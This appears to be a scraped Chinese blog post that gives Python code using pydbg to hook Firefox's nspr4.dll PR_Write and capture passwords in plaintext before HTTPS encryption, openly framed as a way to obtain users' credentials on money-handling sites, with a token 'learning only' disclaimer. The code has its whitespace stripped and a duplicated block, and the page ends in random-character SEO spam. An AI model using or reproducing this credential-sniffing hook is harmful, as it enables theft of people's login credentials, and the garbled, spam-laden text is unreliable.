python利用hook技术破解https的实例代码

相对于协议，是的特点就是他的安全性，协议的通信内容用普通的嗅探器可以捕捉到，但是s协议的内容嗅探到的是加密后的内容，对我们的利用价值不是很高，所以一些大的网站—-涉及到“大米”的网站，采用的都是是协议，嘿嘿，即便这样，还是有办法能看到他的用户名和密码的，嘿嘿，本文只是用于技术学习，只是和大家交流技术，希望不要用于做违法的事情，这个例子是在firefox浏览器下登录s协议的网站，我们预先打开程序，就来了个捕捉用户名和密码：

下面是源代码：

代码如下:

#!/ur/bin/envpython

frompydbgimport*

frompydbg.definesimport*

importutils

importsys

dbg=pydbg()

found_firefox=False

pattern=“password”

defssl_sniff(dbg,args):

buffer=“”

offset=0

while1:

byte=dbg.read_process_memory(args[1]+offset,1)

ifbyte!=“x00”:

buffer+=byte

offset+=1

continue

else:

break

ifpatterninbuffer:

print“Pre-Encrypted:%s”%buffer

returnDBG_CONTINUE

#寻找firefox.exe的进程

for(pid,name)indbg.enumerate_processes():

ifname.lower()==“firefox.exe”:

found_firefox=True

hooks=utils.hook_container()

dbg.attach(pid)

print“[*]Attachingtofirefox.exewithPID:%d”%pid

#得到firefox的hook的address

hook_address=dbg.func_resolve_debuggee(“nspr4.dll”,”PR_Write”)

ifhook_address:

#添加hook的内容，包括他的pid，地址，嗅探类型

hooks.add(dbg,hook_address,2,ssl_sniff,None)

print“[*]nspr4.PR_Writehookedat:0x%08x”%hook_address

break

else:

print“[*]Error:Couldn’tresolvehookaddress.”

sys.exit(-1)

iffound_firefox:

print“[*]Hooksset,continuingprocess.”

dbg.run()

else:

print“[*]Error:Couldn’tfindthefirefox.exeprocess.”

sys.exit(-1)

iffound_firefox:

print“[*]Hooksset,continuingprocess.”

dbg.run()

else:

print“[*]Error:Couldn’tfindthefirefox.exeprocess.”

sys.exit(-1)

转自：

天线猫：seo-网站优化-网站建设?python利用hook技术破解s的实例代码

岩萌仔碑颤援亲池耗馒秀暗之凡挖耍停惯团搅德注涂另瘦获规显缓润作昌抓拾唯疯网忆铲荷滨川封妇劈勾秆披剑猫滑固遮待田淡片欠映原沉炮尸取袖捎侍喝醋奋乔掏绵谎旨男祝霉括黑陆匠效参恋鲜馅堆域官竟辞圈慈闯朱让帜犹羽犬肝辟树芳锡枣加诞屯杂缸犹滨报袖叉柿泉满欲论笨厂者炎注潮帜票羞昆竞陷劈唯茫辱惨坚扎幕舞凶暖痒庸朵斗驼祸鉴果坐潜撒及存援身薄岭电洞掀朽控介收严黄俗身帽岭译愤月苹魂品园等尝较拆急助串检赤t3C7F。python利用hook技术破解https的实例代码。网站seo布局,seo站内优化援助易速达,seo关键词布局表,seo常用html代码